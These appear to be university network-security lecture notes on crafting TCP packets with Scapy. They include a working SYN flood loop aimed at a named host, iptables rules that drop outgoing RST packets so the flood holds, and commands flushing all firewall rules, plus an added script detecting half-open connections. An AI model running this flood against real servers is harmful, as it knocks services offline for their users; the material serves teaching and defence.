IT 4510

Scapy 2

Make sure to allow firewall access from 1.1.1.1 on GAIA


TCP

Recall that a 3-way handshake is:


TCP

Example:


Example code

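    #!/usr/bin/python

    from scapy.all import *

    # Bare name: displays the current socket class when typed in the Scapy shell
    conf.L3socket
    # Switch to a raw L3 socket for sending and receiving
    conf.L3socket = L3RawSocket

    i = IP()
    i.dst = "cit.dixie.edu"

    # Send a SYN (Scapy's default TCP flags) and wait for the SYN-ACK
    t = TCP()
    t.dport = 80
    r = sr1(i/t)

    # Answer the SYN-ACK with an ACK to finish the handshake
    t.flags = "A"
    t.seq = r.ack        # our next sequence number is what the server acknowledged
    t.ack = r.seq + 1    # acknowledge the server's SYN
    p = i/t
    reply = sr(p)        # sr() returns (answered, unanswered)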

SYN Flood

We must start with this:

    sudo iptables -A OUTPUT -p tcp -s 144.38.199.108 --tcp-flags RST RST -j DROP

A better way is this:

    iptables -F; iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

Otherwise the kernel sends RST packets to the target and the SYN flood fails. (We are sending the packets with Scapy, so the OS has no record of the connection; when the target's SYN-ACK comes back, the OS tries to tell the target to ignore the connection.)


SYN Flood

If you start too many SYN requests to a server and never finish the handshake, you can crash the server.

Code to add:

    # t is the TCP layer from the example code above
    for p in range(20000, 20010):
        t.sport = p
        send(i/t)
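Seen from the server, the traffic described above shows up as connections that received a SYN and nothing after it, so counting those per source is a simple detection. This is an added example, not part of the original notes; the packet records, the addresses and the alert threshold of 5 are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of client-to-server packets as the server would see them:
# (src_ip, src_port, dst_port, tcp_flags), flags in Scapy's letter notation
# (S = SYN, A = ACK, R = RST).
PACKETS = (
    # Normal client: SYN, then the final ACK of the handshake
    [("198.51.100.7", 40000, 80, "S"), ("198.51.100.7", 40000, 80, "A")]
    # One source, ten source ports, SYN only: the handshake is never finished
    + [("203.0.113.9", p, 80, "S") for p in range(20000, 20010)]
    # Client whose kernel answered the SYN-ACK with RST (no iptables DROP rule)
    + [("192.0.2.5", 51000, 80, "S"), ("192.0.2.5", 51000, 80, "R")]
)


def half_open_by_source(packets):
    """Return {src_ip: number of connections stuck after the client's SYN}."""
    pending = set()  # (src, sport, dport) with a SYN seen and nothing after it
    for src, sport, dport, flags in packets:
        key = (src, sport, dport)
        if flags == "S":
            pending.add(key)
        elif "A" in flags or "R" in flags:
            # ACK completes the handshake, RST tears the connection down;
            # either way the server no longer holds a half-open entry.
            pending.discard(key)
    counts = defaultdict(int)
    for src, _sport, _dport in pending:
        counts[src] += 1
    return dict(counts)


def flag_sources(packets, threshold=5):
    """Sources whose half-open count reaches the assumed alert threshold."""
    counts = half_open_by_source(packets)
    return sorted(src for src, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    print(half_open_by_source(PACKETS))
    print(flag_sources(PACKETS))
```

The RST case is why the RST-dropping iptables rule matters: once the client's kernel resets the connection, the server frees the half-open entry and nothing accumulates.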

Slowloris

Remove iptables junk from above:

    iptables -P INPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -t nat -F
    iptables -t mangle -F
    iptables -F
    iptables -X